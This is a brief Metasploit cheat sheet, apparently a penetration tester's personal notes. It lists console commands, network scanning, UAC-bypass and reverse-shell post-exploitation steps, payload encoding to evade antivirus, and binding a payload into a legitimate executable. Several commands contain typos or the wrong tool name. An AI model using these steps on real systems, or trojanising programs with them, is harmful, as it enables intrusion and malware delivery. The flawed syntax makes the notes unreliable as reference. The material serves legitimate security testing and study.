Metasploit

  • https://www.andreafortuna.org/2017/12/11/metasploit-console-my-own-cheatsheet/
  • https://www.offensive-security.com/metasploit-unleashed/Pivoting/
  • https://www.offensive-security.com/metasploit-unleashed/Portfwd/
  • https://www.offensive-security.com/metasploit-unleashed/proxytunnels/

General Commands:

show auxilary
search snmp
use snmp_enum
info
show options
set RHOS ip
run
setg RHOST ip (global set)

Hosts:

db_nmap ip-range --top-ports 20 (to populate database)

Search Services:

services -p 443 (search all machines with 443 open)

Modifying exploit:

~/.msf4/modules/exploits/windows/misc/vulnserver.rb

Post exploitation

  • exploit/windows/local/bypassuac
  • set payload to reverse-shell (so that a new session will be created)
  • migrate to a system privileged process

Encode

msfpayload ............ | msfconsole -e x86/shikata_ga_nai -t exe -c 9 -o exe.exe

Binding

msfpayload ............ | msfconsole -e x86/shikata_ga_nai -t exe -c 9 -x goodexe.exe -o bound.exe

Auto Migrate

set AutoRunScript post/windows/manage/migrate